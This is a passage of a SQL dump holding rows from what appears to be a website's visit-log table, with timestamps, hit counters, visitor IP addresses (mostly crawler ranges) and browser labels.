04928033,1,1,0,0,'69.171.251.16','other'),(546795,1604928325,1,1,0,0,'31.13.127.16','other'),(546796,1604928367,1,1,0,0,'69.171.251.116','other'),(546797,1604928517,1,1,0,0,'69.171.251.120','other'),(546798,1604928712,1,1,0,0,'66.220.149.1','other'),(546799,1604928796,1,1,0,0,'185.237.217.13','chrome'),(546800,1604928945,3,3,0,0,'31.13.127.18','other'),(546802,1604928946,2,2,0,0,'31.13.127.17','other'),(546804,1604928947,1,1,0,0,'31.13.127.9','other'),(546805,1604929038,1,1,0,0,'66.220.149.32','other'),(546806,1604929092,1,1,0,0,'178.133.236.39','chrome'),(546807,1604929115,1,1,0,0,'31.13.127.20','other'),(546808,1604929123,1,1,0,0,'66.220.149.113','other'),(546809,1604929171,1,1,0,0,'173.252.127.30','other'),(546810,1604929442,1,1,0,0,'173.252.127.19','other'),(546811,1604929837,1,1,0,0,'69.171.251.17','other'),(546812,1604929878,1,1,0,0,'173.252.127.2','other'),(546814,1604930122,1,1,0,0,'69.171.251.4','other'),(546815,1604930213,1,1,0,0,'31.10.244.246','chrome'),(546816,1604930384,1,1,0,0,'46.211.54.237','chrome'),(546817,1604930695,1,1,0,0,'31.13.127.11','other'),(546818,1604930703,1,1,0,0,'69.171.251.1','other'),(546819,1604930860,1,1,0,0,'173.252.127.12','other'),(546820,1604930927,1,1,0,0,'173.252.95.15','other'),(546821,1604931239,1,1,0,0,'66.220.149.22','other'),(546823,1604931522,1,1,0,0,'31.13.127.20','other'),(546824,1604931731,2,2,0,0,'69.171.251.111','other'),(546825,1604931753,1,1,0,0,'178.95.247.51','chrome'),(546826,1604931799,1,1,0,0,'66.220.149.6','other'),(546827,1604932222,1,1,0,0,'69.171.251.29','other'),(546828,1604932257,1,1,0,0,'69.171.251.14','other'),(546829,1604932514,1,1,0,0,'173.252.127.26','other'),(546830,1604932520,1,1,0,0,'66.220.149.13','other'),(546831,1604932748,1,1,0,0,'69.171.251.6','other'),(546832,1604932749,1,1,0,0,'66.220.149.30','other'),(546833,1604932791,1,1,0,0,'69.171.251.19','other'),(546834,1604933083,1,1,0,0,'69.171.251.8','other'),(546835,1604933164,1,1,0,0,'31.13.127.117','other'),(546836,1604933288,1,1,0,0,'66.249.66.93','chrome'),(546837,1604933351,1,1,0,0,'69.171.251.118','other'),(546838,1604933413,1,1,0,0,'173.252.127.15','other'),(546839,1604933595,1,1,0,0,'173.252.127.20','other'),(546840,1604933857,1,1,0,0,'66.220.149.16','other'),(546841,1604933973,1,1,0,0,'91.196.178.77','chrome'),(546842,1604934159,1,1,0,0,'69.171.251.21','other'),(546843,1604935021,1,1,0,0,'31.13.103.20','other'),(546844,1604935099,1,1,0,0,'173.252.127.12','other'),(546845,1604935137,1,1,0,0,'69.171.251.18','other'),(546846,1604935166,1,1,0,0,'66.220.149.23','other'),(546847,1604935201,1,1,0,0,'66.220.149.27','other'),(546848,1604935266,1,1,0,0,'173.252.127.27','other'),(546849,1604935415,1,1,0,0,'31.13.127.10','other'),(546850,1604935968,1,1,0,0,'66.220.149.7','other'),(546851,1604936260,1,1,0,0,'173.252.127.33','other'),(546852,1604936284,1,1,0,0,'69.171.251.4','other'),(546853,1604936361,2,2,0,0,'69.171.251.19','other'),(546854,1604936394,1,1,0,0,'31.13.127.16','other'),(546855,1604936467,1,1,0,0,'173.252.127.37','other'),(546856,1604936663,1,1,0,0,'69.171.251.11','other'),(546857,1604936710,1,1,0,0,'66.220.149.8','other'),(546858,1604936943,2,2,0,0,'31.13.127.3','other'),(546859,1604936996,1,1,0,0,'95.135.90.198','chrome'),(546860,1604937246,1,1,0,0,'66.220.149.26','other'),(546861,1604937248,1,1,0,0,'173.252.127.19','other'),(546862,1604937314,1,1,0,0,'69.171.251.26','other'),(546863,1604937386,1,1,0,0,'69.171.251.8','other'),(546864,1604937506,1,1,0,0,'69.171.251.10','other'),(546865,1604937802,1,1,0,0,'66.220.149.8','other'),(546866,1604937884,1,1,0,0,'173.252.127.36','other'),(546867,1604937929,1,1,0,0,'66.220.149.6','other'),(546868,1604938038,1,1,0,0,'31.13.115.1','other'),(546869,1604938311,1,1,0,0,'66.220.149.2','other'),(546870,1604938452,1,1,0,0,'173.252.127.5','other'),(546872,1604938453,1,1,0,0,'66.220.149.21','other'),(546873,1604938467,1,1,0,0,'66.220.149.37','other'),(546874,1604938532,1,1,0,0,'46.201.252.220','other'),(546875,1604938533,1,1,0,0,'66.220.149.20','other'),(546876,1604938553,1,1,0,0,'66.220.149.23','other'),(546877,1604938709,1,1,0,0,'69.171.251.8','other'),(546878,1604938822,1,1,0,0,'69.171.251.26','other'),(546879,1604938902,1,1,0,0,'31.13.127.18','other'),(546880,1604939065,1,1,0,0,'66.249.66.93','chrome'),(546881,1604939528,1,1,0,0,'69.171.251.32','other'),(546882,1604939740,1,1,0,0,'173.252.127.24','other'),(546883,1604939741,1,1,0,0,'173.252.87.28','other'),(546884,1604939850,1,1,0,0,'69.171.251.28','other'),(546885,1604939969,1,1,0,0,'66.220.149.5','other'),(546886,1604940053,1,1,0,0,'31.13.127.7','other'),(546887,1604940170,1,1,0,0,'69.171.251.112','other'),(546888,1604940365,1,1,0,0,'173.252.127.26','other'),(546889,1604940453,1,1,0,0,'69.171.251.31','other'),(546890,1604940548,1,1,0,0,'173.252.127.25','other'),(546891,1604940552,1,1,0,0,'46.211.34.17','chrome'),(546892,1604940689,1,1,0,0,'173.252.127.37','other'),(546893,1604940851,1,1,0,0,'66.220.149.2','other'),(546894,1604941362,1,1,0,0,'66.220.149.28','other'),(546895,1604941363,1,1,0,0,'173.252.127.30','other'),(546896,1604941469,2,2,0,0,'173.252.127.117','other'),(546897,1604941560,2,2,0,0,'69.171.251.10','other'),(546898,1604941681,1,1,0,0,'173.252.127.31','other'),(546899,1604941838,1,1,0,0,'31.13.127.17','other'),(546901,1604941848,1,1,0,0,'173.252.127.7','other'),(546902,1604942078,1,1,0,0,'66.220.149.11','other'),(546903,1604942320,1,1,0,0,'173.252.127.28','other'),(546904,1604942340,2,2,0,0,'94.153.84.106','chrome'),(546905,1604942401,1,1,0,0,'66.220.149.5','other'),(546906,1604942414,1,1,0,0,'173.252.127.10','other'),(546907,1604942982,1,1,0,0,'37.55.238.143','chrome'),(546908,1604943390,1,1,0,0,'173.252.127.23','other'),(546909,1604943481,1,1,0,0,'66.220.149.117','other'),(546911,1604943588,1,1,0,0,'31.13.127.7','other'),(546912,1604943631,1,1,0,0,'66.220.149.29','other'),(546913,1604943873,1,1,0,0,'69.171.251.31','other'),(546914,1604943909,1,1,0,0,'69.171.251.27','other'),(546915,1604944088,1,1,0,0,'66.220.149.11','other'),(546916,1604944146,1,1,0,0,'173.252.127.2','other'),(546917,1604944199,1,1,0,0,'69.171.251.13','other'),(546918,1604944238,1,1,0,0,'173.252.127.118','other'),(546919,1604944242,1,1,0,0,'69.171.251.22','other'),(546920,1604944342,1,1,0,0,'173.252.127.29','other'),(546921,1604944380,1,1,0,0,'31.13.127.16','other'),(546922,1604944388,1,1,0,0,'69.171.251.32','other'),(546923,1604944530,1,1,0,0,'69.171.251.24','other'),(546924,1604944588,1,1,0,0,'31.13.127.2','other'),(546925,1604944592,1,1,0,0,'69.171.251.33','other'),(546926,1604944621,1,1,0,0,'66.220.149.30','other'),(546927,1604944640,1,1,0,0,'176.105.198.32','chrome'),(546928,1604944754,1,1,0,0,'91.196.178.36','chrome'),(546929,1604945142,1,1,0,0,'173.252.95.12','other'),(546930,1604945197,1,1,0,0,'69.171.251.5','other'),(546931,1604945428,1,1,0,0,'69.171.251.28','other'),(546932,1604945477,1,1,0,0,'69.171.251.13','other'),(546934,1604945565,1,1,0,0,'130.180.217.248','chrome'),(546935,1604945738,1,1,0,0,'69.171.251.10','other'),(546936,1604945783,1,1,0,0,'69.171.251.111','other'),(546937,1604945865,1,1,0,0,'66.220.149.12','other'),(546938,1604946095,1,1,0,0,'69.171.251.22','other'),(546939,1604946100,1,1,0,0,'31.13.127.19','other'),(546940,1604946313,1,1,0,0,'173.252.111.112','other'),(546941,1604946412,1,1,0,0,'69.171.251.12','other'),(546942,1604946566,2,2,0,0,'69.171.251.14','other'),(546943,1604946582,1,1,0,0,'91.196.178.42','chrome'),(546944,1604946954,1,1,0,0,'31.13.127.23','other'),(546945,1604947111,1,1,0,0,'69.171.251.30','other'),(546946,1604947123,1,1,0,0,'46.211.73.29','chrome'),(546947,1604947209,1,1,0,0,'91.196.178.58','chrome'),(546948,1604947236,1,1,0,0,'66.220.149.10','other'),(546949,1604947311,1,1,0,0,'69.171.251.19','other'),(546950,1604947372,1,1,0,0,'173.252.127.111','other'),(546951,1604948048,1,1,0,0,'31.13.127.18','other'),(546952,1604948077,1,1,0,0,'69.171.251.25','other'),(546953,1604948090,1,1,0,0,'69.171.251.21','other'),(546955,1604948323,1,1,0,0,'91.196.178.23','chrome'),(546956,1604948529,1,1,0,0,'31.13.127.12','other'),(546957,1604948796,1,1,0,0,'173.252.127.1','other'),(546958,1604949103,2,2,0,0,'69.171.251.18','other'),(546959,1604949146,1,1,0,0,'212.3.198.214','chrome'),(546960,1604949162,1,1,0,0,'31.13.103.20','other'),(546961,1604949174,1,1,0,0,'173.252.127.27','other'),(546962,1604949344,1,1,0,0,'31.13.127.4','other'),(546963,1604949800,1,1,0,0,'69.171.251.15','other'),(546964,1604949827,1,1,0,0,'66.220.149.116','other'),(546965,1604949845,1,1,0,0,'66.220.149.117','other'),(546966,1604950146,1,1,0,0,'69.171.251.26','other'),(546967,1604950158,1,1,0,0,'173.252.127.4','other'),(546968,1604950287,2,2,0,0,'31.13.127.10','other'),(546969,1604951477,1,1,0,0,'69.171.251.119','other'),(546970,1604951768,1,1,0,0,'31.13.127.118','other'),(546971,1604951798,1,1,0,0,'66.220.149.118','other'),(546972,1604952205,1,1,0,0,'173.252.127.19','other'),(546973,1604952287,1,1,0,0,'69.171.251.16','other'),(546974,1604952289,1,1,0,0,'146.0.87.169','other'),(546975,1604952330,1,1,0,0,'66.220.149.12','other'),(546976,1604952338,1,1,0,0,'91.196.178.131','chrome'),(546977,1604952370,1,1,0,0,'91.196.178.181','chrome'),(546978,1604952383,1,1,0,0,'69.171.251.113','other'),(546979,1604952388,1,1,0,0,'173.252.95.119','other'),(546980,1604952455,1,1,0,0,'69.171.251.119','other'),(546981,1604952690,1,1,0,0,'69.171.251.31','other'),(546982,1604952735,1,1,0,0,'66.220.149.32','other'),(546983,1604952791,1,1,0,0,'173.252.127.37','other'),(546984,1604953077,1,1,0,0,'69.171.251.24','other'),(546985,1604953706,1,1,0,0,'69.171.251.8','other'),(546986,1604954144,1,1,0,0,'69.171.251.15','other'),(546987,1604954250,1,1,0,0,'66.220.149.16','other'),(546988,1604954328,1,1,0,0,'173.252.107.14','other'),(546989,1604954338,1,1,0,0,'69.171.251.118','other'),(546990,1604954444,1,1,0,0,'173.252.127.5','other'),(546991,1604954761,1,1,0,0,'66.220.149.5','other'),(546992,1604954794,1,1,0,0,'66.220.149.25','other'),(546993,1604954859,1,1,0,0,'91.196.178.131','chrome'),(546994,1604954893,1,1,0,0,'91.196.177.11','other'),(546995,1604955246,1,1,0,0,'173.252.111.2','other'),(546996,1604955518,1,1,0,0,'173.252.95.18','other'),(546997,1604955520,1,1,0,0,'173.252.127.19','other'),(546998,1604955600,1,1,0,0,'173.252.127.116','other'),(546999,1604955677,1,1,0,0,'31.13.103.117','other'),(547000,1604955875,1,1,0,0,'31.13.127.11','other'),(547001,1604955890,1,1,0,0,'69.171.251.33','other'),(547002,1604955891,1,1,0,0,'69.171.251.113','other'),(547003,1604956064,2,2,0,0,'69.171.251.29','other'),(547004,1604956097,1,1,0,0,'37.55.56.13','chrome'),(547005,1604956132,1,1,0,0,'66.220.149.13','other'),(547006,1604956198,2,2,0,0,'69.171.251.28','other'),(547007,1604956204,1,1,0,0,'173.252.127.4','other'),(547008,1604956275,1,1,0,0,'91.196.178.1','chrome'),(547009,1604957599,1,1,0,0,'69.171.251.5','other'),(547010,1604957679,1,1,0,0,'173.252.127.7','other'),(547011,1604957699,1,1,0,0,'31.13.127.113','other'),(547012,1604957835,1,1,0,0,'69.171.251.117','other'),(547013,1604958835,1,1,0,0,'31.13.127.16','other'),(547014,1604958890,1,1,0,0,'69.171.251.6','other'),(547015,1604959041,1,1,0,0,'185.237.217.16','chrome'),(547016,1604959668,1,1,0,0,'31.13.127.116','other'),(547017,1604959680,1,1,0,0,'69.171.251.8','other'),(547018,1604960019,1,1,0,0,'69.171.251.26','other'),(547019,1604960024,1,1,0,0,'66.220.149.29','other'),(547020,1604960203,1,1,0,0,'69.171.251.117','other'),(547021,1604960493,1,1,0,0,'66.220.149.14','other'),(547022,1604961602,1,1,0,0,'66.220.149.31','other'),(547023,1604962139,1,1,0,0,'66.220.149.6','other'),(547024,1604962165,1,1,0,0,'69.171.251.29','other'),(547025,1604962264,1,1,0,0,'69.171.251.119','other'),(547026,1604962353,1,1,0,0,'31.13.103.2','other'),(547027,1604963199,1,1,0,0,'69.171.251.27','other'),(547028,1604963425,1,1,0,0,'173.252.127.31','other'),(547029,1604964386,1,1,0,0,'66.220.149.3','other'),(547030,1604965133,1,1,0,0,'31.13.103.18','other'),(547031,1604965339,1,1,0,0,'173.252.95.21','other'),(547032,1604966028,1,1,0,0,'173.252.127.18','other'),(547033,1604966062,1,1,0,0,'91.196.178.135','chrome'),(547034,1604966458,1,1,0,0,'31.13.103.9','other'),(547035,1604966460,4,4,0,0,'31.13.103.7','other'),(547039,1604966461,2,2,0,0,'31.13.103.17','other'),(547041,1604966465,1,1,0,0,'31.13.103.15','other'),(547042,1604966496,1,1,0,0,'66.220.149.4','other'),(547043,1604966514,1,1,0,0,'31.13.127.16','other'),(547044,1604966525,1,1,0,0,'31.13.127.120','other'),(547045,1604966547,1,1,0,0,'69.171.251.6','other'),(547046,1604966983,1,1,0,0,'31.13.127.1','other'),(547047,1604967511,1,1,0,0,'173.252.127.119','other'),(547048,1604967589,1,1,0,0,'173.252.95.7','other'),(547049,1604968776,1,1,0,0,'173.252.127.19','other'),(547050,1604970210,1,1,0,0,'69.171.251.25','other'),(547051,1604971476,1,1,0,0,'173.252.127.21','other'),(547052,1604971531,1,1,0,0,'66.220.149.1','other'),(547053,1604971656,1,1,0,0,'69.171.251.5','other'),(547054,1604972441,1,1,0,0,'66.220.149.112','other'),(547055,1604972684,1,1,0,0,'31.13.115.113','other'),(547056,1604972723,1,1,0,0,'69.171.251.116','other'),(547057,1604973351,1,1,0,0,'66.220.149.1','other'),(547058,1604973670,1,1,0,0,'173.252.127.26','other'),(547059,1604976634,1,0,1,0,'66.249.66.93',''),(547060,1604977277,1,1,0,0,'69.171.251.21','other'),(547062,1604977435,1,1,0,0,'66.220.149.3','other'),(547063,1604977916,1,1,0,0,'69.171.251.11','other'),(547064,1604977936,1,1,0,0,'66.220.149.119','other'),(547065,1604978112,1,1,0,0,'69.171.251.10','other'),(547066,1604978113,1,1,0,0,'173.252.79.7','other'),(547067,1604978255,1,1,0,0,'173.252.95.8','other'),(547068,1604978803,1,1,0,0,'69.171.251.8','other'),(547069,1604978879,1,1,0,0,'173.252.95.23','other'),(547070,1604979084,1,1,0,0,'31.13.115.16','other'),(547071,1604979116,1,1,0,0,'37.73.131.241','chrome'),(547072,1604979149,1,1,0,0,'31.13.115.120','other'),(547073,1604979412,1,1,0,0,'69.171.251.18','other'),(547074,1604979438,1,1,0,0,'69.171.251.7','other'),(547075,1604980415,1,1,0,0,'69.171.251.21','other'),(547076,1604981309,1,1,0,0,'69.171.251.4','other'),(547077,1604981327,1,1,0,0,'66.220.149.119','other'),(547078,1604981402,1,1,0,0,'31.13.115.19','other'),(547079,1604981692,1,1,0,0,'31.13.103.22','other'),(547080,1604982176,1,1,0,0,'66.220.149.118','other'),(547081,1604982201,1,1,0,0,'69.171.251.10','other'),(547082,1604982237,1,1,0,0,'69.171.251.4','other'),(547083,1604982758,1,1,0,0,'31.13.103.23','other'),(547084,1604982902,1,1,0,0,'66.220.149.4','other'),(547085,1604982991,1,1,0,0,'69.171.251.5','other'),(547086,1604983243,1,1,0,0,'69.171.251.113','other'),(547087,1604983244,1,1,0,0,'31.13.103.12','other'),(547088,1604983502,1,1,0,0,'94.153.23.47','chrome'),(547089,1604983767,1,1,0,0,'69.171.251.20','other'),(547090,1604984350,1,1,0,0,'69.171.251.117','other'),(547091,1604984356,1,1,0,0,'91.196.178.25','chrome'),(547092,1604984389,1,1,0,0,'66.220.149.12','other'),(547093,1604984524,1,1,0,0,'173.252.127.8','other'),(547094,1604984662,1,1,0,0,'173.252.95.10','other'),(547095,1604984893,1,1,0,0,'31.13.103.3','other'),(547096,1604984917,1,1,0,0,'173.252.127.13','other'),(547097,1604984999,1,1,0,0,'69.171.251.120','other'),(547098,1604985013,1,1,0,0,'46.211.70.69','chrome'),(547099,1604985085,1,1,0,0,'66.220.149.33','other'),(547100,1604985097,1,1,0,0,'31.13.103.21','other'),(547101,1604985170,1,1,0,0,'69.171.251.3','other'),(547102,1604985572,1,1,0,0,'66.220.149.15','other'),(547103,1604985641,1,1,0,0,'69.171.251.117','other'),(547104,1604985681,1,1,0,0,'46.133.88.190','chrome'),(547105,1604985768,1,1,0,0,'31.13.103.24','other'),(547106,1604985847,1,1,0,0,'69.171.251.119','other'),(547107,1604986096,1,1,0,0,'173.252.95.15','other'),(547108,1604986495,1,1,0,0,'31.13.127.1','other'),(547109,1604986519,1,1,0,0,'31.13.127.21','other'),(547110,1604986559,1,1,0,0,'69.171.251.1','other'),(547111,1604986561,1,1,0,0,'66.220.149.15','other'),(547112,1604986608,1,1,0,0,'94.153.67.128','chrome'),(547113,1604986882,1,1,0,0,'69.171.251.20','other'),(547114,1604987249,1,1,0,0,'66.220.149.23','other'),(547115,1604987314,1,1,0,0,'173.252.127.2','other'),(547116,1604987582,1,1,0,0,'66.220.149.10','other'),(547117,1604987603,1,1,0,0,'31.13.127.120','other'),(547118,1604987606,1,1,0,0,'69.171.251.19','other'),(547119,1604988314,1,1,0,0,'31.13.127.112','other'),(547120,1604988523,1,1,0,0,'69.171.251.3','other'),(547121,1604988695,1,1,0,0,'69.171.251.6','other'),(547122,1604988844,1,1,0,0,'66.220.149.119','other'),(547123,1604988871,1,1,0,0,'91.196.178.57','chrome'),(547124,1604989117,1,1,0,0,'173.252.95.19','other'),(547125,1604989205,1,1,0,0,'66.220.149.11','other'),(547126,1604989216,1,1,0,0,'37.73.165.46','chrome'),(547127,1604989261,1,1,0,0,'31.13.103.112','other'),(547128,1604989298,1,1,0,0,'173.252.127.7','other'),(547129,1604989434,1,1,0,0,'66.220.149.2','other'),(547130,1604989477,2,2,0,0,'69.171.251.12','other'),(547131,1604989584,1,1,0,0,'66.220.149.120','other'),(547132,1604989730,1,1,0,0,'173.252.127.116','other'),(547133,1604989773,1,1,0,0,'66.220.149.118','other'),(547134,1604989910,1,1,0,0,'173.252.127.23','other'),(547135,1604989994,1,1,0,0,'91.196.178.190','other'),(547136,1604990212,1,1,0,0,'173.252.95.117','other'),(547137,1604990277,1,1,0,0,'69.171.251.8','other'),(547138,1604990457,1,1,0,0,'31.13.127.4','other'),(547139,1604990695,1,1,0,0,'91.196.178.183','chrome'),(547140,1604990748,1,1,0,0,'173.252.127.11','other'),(547141,1604990941,1,1,0,0,'173.252.127.20','other'),(547142,1604990959,1,1,0,0,'69.171.251.119','other'),(547143,1604991260,1,1,0,0,'69.171.251.120','other'),(547144,1604991265,1,1,0,0,'69.171.251.112','other'),(547145,1604991493,1,1,0,0,'66.220.149.118','other'),(547146,1604991547,1,1,0,0,'69.171.251.15','other'),(547148,1604991613,1,1,0,0,'66.220.149.20','other'),(547149,1604991649,1,1,0,0,'31.13.127.8','other'),(547150,1604991779,1,1,0,0,'69.171.251.117','other'),(547151,1604991781,1,1,0,0,'173.252.95.8','other'),(547152,1604991830,1,1,0,0,'91.196.178.14','chrome'),(547153,1604991908,1,1,0,0,'66.220.149.2','other'),(547154,1604991912,1,1,0,0,'69.171.251.18','other'),(547155,1604992063,1,1,0,0,'178.95.246.162','chrome'),(547156,1604992342,1,1,0,0,'173.252.127.5','other'),(547157,1604992387,1,1,0,0,'69.171.251.24','other'),(547158,1604993180,1,1,0,0,'66.220.149.111','other'),(547159,1604993194,1,1,0,0,'69.171.251.7','other'),(547160,1604993222,1,1,0,0,'91.196.178.76','chrome'),(547161,1604993544,1,1,0,0,'173.252.111.16','other'),(547162,1604993566,1,1,0,0,'66.249.83.78','chrome'),(547163,1604993758,1,1,0,0,'69.171.251.14','other'),(547164,1604993934,1,1,0,0,'66.220.149.31','other'),(547165,1604993943,1,1,0,0,'31.13.127.111','other'),(547166,1604993944,1,1,0,0,'69.171.251.111','other'),(547167,1604994105,1,1,0,0,'173.252.79.14','other'),(547168,1604994187,1,1,0,0,'69.171.251.119','other'),(547169,1604994365,1,1,0,0,'66.220.149.23','other'),(547170,1604994428,1,1,0,0,'91.196.178.120','chrome'),(547171,1604994457,1,1,0,0,'31.13.127.24','other'),(547172,1604994461,1,1,0,0,'31.13.127.5','other'),(547173,1604994590,1,1,0,0,'31.13.127.112','other'),(547174,1604994652,1,1,0,0,'31.13.103.112','other'),(547175,1604994702,1,1,0,0,'69.171.251.11','other'),(547176,1604994746,1,1,0,0,'66.220.149.2','other'),(547177,1604994756,1,1,0,0,'69.171.251.5','other'),(547178,1604995601,1,1,0,0,'66.220.149.20','other'),(547179,1604995714,1,1,0,0,'31.13.127.117','other'),(547180,1604995899,1,1,0,0,'91.196.178.91','chrome'),(547181,1604996000,1,1,0,0,'69.171.251.6','other'),(547182,1604996191,1,1,0,0,'66.220.149.9','other'),(547183,1604996297,1,1,0,0,'31.13.127.7','other'),(547184,1604996304,1,1,0,0,'66.220.149.14','other'),(547185,1604996310,1,1,0,0,'31.13.127.6','other'),(547186,1604996313,2,2,0,0,'173.252.127.9','other'),(547187,1604996331,2,2,0,0,'173.252.127.19','other'),(547188,1604996395,1,1,0,0,'173.252.95.11','other'),(547189,1604996401,1,1,0,0,'69.171.251.7','other'),(547190,1604996456,2,2,0,0,'69.171.251.1','other'),(547191,1604996462,1,1,0,0,'46.211.91.235','chrome'),(547192,1604996558,1,1,0,0,'93.73.34.217','chrome'),(547193,1604996755,1,1,0,0,'66.220.149.15','other'),(547194,1604996853,1,1,0,0,'173.252.127.15','other'),(547195,1604996958,1,1,0,0,'66.220.149.111','other'),(547196,1604996961,1,1,0,0,'66.220.149.24','other'),(547197,1604996999,1,1,0,0,'173.252.95.6','other'),(547198,1604997065,1,1,0,0,'31.13.127.18','other'),(547199,1604997187,1,1,0,0,'94.153.68.8','chrome'),(547200,1604997346,1,1,0,0,'69.171.251.17','other'),(547202,1604997706,1,1,0,0,'31.13.127.21','other'),(547203,1604997728,2,2,0,0,'66.220.149.31','other'),(547204,1604997775,1,1,0,0,'173.252.127.25','other'),(547205,1604997794,1,1,0,0,'173.252.127.21','other'),(547206,1604997830,1,1,0,0,'173.252.127.20','other'),(547207,1604997868,1,1,0,0,'173.252.127.119','other'),(547208,1604997916,1,1,0,0,'66.220.149.16','other'),(547209,1604997965,1,1,0,0,'31.13.127.5','other'),(547210,1604997967,1,1,0,0,'31.13.103.23','other'),(547211,1604998102,1,1,0,0,'69.171.251.118','other'),(547212,1604998263,1,1,0,0,'66.220.149.27','other'),(547213,1604998390,1,1,0,0,'69.171.251.12','other'),(547214,1604998411,1,1,0,0,'31.13.127.117','other'),(547215,1604998429,1,1,0,0,'31.13.127.14','other'),(547216,1604998433,1,1,0,0,'66.220.149.18','other'),(547217,1604998487,1,1,0,0,'66.220.149.17','other'),(547218,1604998505,1,1,0,0,'173.252.95.120','other'),(547219,1604998971,1,1,0,0,'173.252.111.120','other'),(547220,1604998992,1,1,0,0,'66.220.149.12','other'),(547221,1604998995,1,1,0,0,'173.252.127.120','other'),(547222,1604999053,1,1,0,0,'69.171.251.6','other'),(547224,1604999090,2,2,0,0,'31.13.127.24','other'),(547225,1604999149,1,1,0,0,'173.252.95.24','other'),(547226,1604999185,1,1,0,0,'69.171.251.14','other'),(547227,1604999331,1,1,0,0,'31.13.115.118','other'),(547228,1604999426,2,2,0,0,'69.171.251.24','other'),(547229,1604999740,1,1,0,0,'173.252.95.20','other'),(547230,1604999880,1,1,0,0,'46.211.66.12','chrome'),(547231,1604999969,1,1,0,0,'66.220.149.27','other'),(547232,1605000042,1,1,0,0,'173.252.111.5','other'),(547233,1605000146,1,1,0,0,'69.171.251.112','other'),(547234,1605000243,1,1,0,0,'173.252.127.17','other'),(547235,1605000308,1,1,0,0,'173.252.127.3','other'),(547236,1605000616,1,1,0,0,'69.171.251.116','other'),(547238,1605000762,1,1,0,0,'66.220.149.35','other'),(547239,1605001003,1,1,0,0,'66.220.149.36','other'),(547240,1605001092,1,1,0,0,'69.171.251.19','other'),(547241,1605001150,2,2,0,0,'173.252.95.17','other'),(547242,1605001486,1,1,0,0,'173.252.127.10','other'),(547243,1605001516,1,1,0,0,'69.171.251.117','other'),(547244,1605001633,1,1,0,0,'66.220.149.17','other'),(547245,1605001788,1,1,0,0,'173.252.127.120','other'),(547246,1605001803,1,1,0,0,'69.171.251.28','other'),(547247,1605001819,1,1,0,0,'173.252.111.2','other'),(547248,1605001917,1,1,0,0,'173.252.95.111','other'),(547249,1605002119,1,1,0,0,'31.13.127.1','other'),(547250,1605003102,1,1,0,0,'66.220.149.16','other'),(547251,1605003103,1,1,0,0,'69.171.251.17','other'),(547252,1605003346,1,1,0,0,'31.13.127.16','other'),(547253,1605003939,1,1,0,0,'66.220.149.8','other'),(547254,1605004183,1,1,0,0,'69.171.251.17','other'),(547255,1605004519,1,1,0,0,'173.252.95.9','other'),(547256,1605004734,1,1,0,0,'66.220.149.30','other'),(547257,1605004785,1,1,0,0,'66.220.149.36','other'),(547258,1605004788,1,1,0,0,'69.171.251.26','other'),(547259,1605005045,1,1,0,0,'91.196.178.14','chrome'),(547260,1605005440,1,1,0,0,'66.220.149.119','other'),(547261,1605005560,1,1,0,0,'31.13.127.14','other'),(547262,1605005566,1,1,0,0,'69.171.251.11','other'),(547263,1605005614,1,1,0,0,'69.171.251.12','other'),(547264,1605005803,1,1,0,0,'66.220.149.29','other'),(547265,1605005830,1,1,0,0,'173.252.127.13','other'),(547266,1605006017,1,1,0,0,'173.252.95.13','other'),(547267,1605006127,1,1,0,0,'173.252.95.14','other'),(547268,1605006196,1,1,0,0,'31.13.127.22','other'),(547269,1605006273,1,1,0,0,'69.171.251.24','other'),(547270,1605006402,1,1,0,0,'46.211.23.85','chrome'),(547271,1605006751,1,1,0,0,'66.220.149.2','other'),(547272,1605006906,1,1,0,0,'91.196.178.141','chrome'),(547273,1605006909,1,1,0,0,'31.13.127.15','other'),(547274,1605007283,1,1,0,0,'173.252.127.10','other'),(547275,1605008256,1,1,0,0,'66.220.149.119','other'),(547276,1605008259,1,1,0,0,'173.252.127.24','other'),(547277,1605008264,1,1,0,0,'69.171.251.24','other'),(547278,1605008311,1,1,0,0,'173.252.95.12','other'),(547279,1605009219,2,2,0,0,'69.171.251.22','other'),(547280,1605009222,1,1,0,0,'69.171.251.111','other'),(547281,1605009223,1,1,0,0,'66.220.149.26','other'),(547282,1605009232,1,1,0,0,'46.211.18.48','chrome'),(547283,1605010074,1,1,0,0,'54.221.27.173','chrome'),(547284,1605010152,1,1,0,0,'31.13.127.22','other'),(547285,1605010175,1,1,0,0,'69.171.251.14','other'),(547286,1605010337,1,1,0,0,'66.220.149.19','other'),(547287,1605010358,1,1,0,0,'46.211.18.48','chrome'),(547288,1605010943,1,1,0,0,'31.13.127.24','other'),(547289,1605011300,1,1,0,0,'66.220.149.27','other'),(547290,1605011734,1,1,0,0,'66.220.149.18','other'),(547291,1605011745,1,1,0,0,'78.111.185.164','chrome'),(547292,1605011770,1,1,0,0,'173.252.127.20','other'),(547293,1605011938,1,1,0,0,'46.211.38.29','chrome'),(547294,1605011946,1,1,0,0,'69.171.251.112','other'),(547295,1605012039,1,1,0,0,'69.171.251.116','other'),(547296,1605012061,1,1,0,0,'173.252.127.23','other'),(547297,1605012143,1,1,0,0,'69.171.251.3','other'),(547298,1605012309,1,1,0,0,'173.252.95.20','other'),(547299,1605012732,1,1,0,0,'69.171.251.23','other'),(547300,1605012791,1,1,0,0,'31.13.127.24','other'),(547301,1605012871,1,1,0,0,'69.171.251.7','other'),(547302,1605013011,1,1,0,0,'66.220.149.12','other'),(547303,1605013148,1,1,0,0,'69.171.251.21','other'),(547304,1605013759,1,1,0,0,'69.171.251.23','other'),(547305,1605013763,1,1,0,0,'66.220.149.19','other'),(547306,1605013865,1,1,0,0,'173.252.95.6','other'),(547307,1605014215,1,1,0,0,'31.13.127.4','other'),(547308,1605014580,1,1,0,0,'66.220.149.14','other'),(547309,1605014616,1,1,0,0,'173.252.95.4','other'),(547310,1605014679,1,1,0,0,'69.171.251.7','other'),(547311,1605014701,1,1,0,0,'173.252.127.22','other'),(547312,1605015116,1,1,0,0,'173.252.127.19','other'),(547313,1605015224,1,1,0,0,'31.13.103.4','other'),(547314,1605015361,1,1,0,0,'31.13.127.22','other'),(547315,1605015465,1,1,0,0,'69.171.251.120','other'),(547316,1605015713,1,1,0,0,'66.220.149.34','other'),(547317,1605015813,1,1,0,0,'31.13.127.23','other'),(547318,1605015951,1,1,0,0,'173.252.127.10','other'),(547319,1605016262,1,1,0,0,'66.220.149.32','other'),(547320,1605016369,1,1,0,0,'173.252.95.116','other'),(547321,1605016532,1,1,0,0,'31.13.127.18','other'),(547322,1605016541,1,1,0,0,'69.171.251.28','other'),(547323,1605016558,1,1,0,0,'69.171.251.8','other'),(547324,1605016631,1,1,0,0,'69.171.251.112','other'),(547325,1605016796,1,1,0,0,'66.220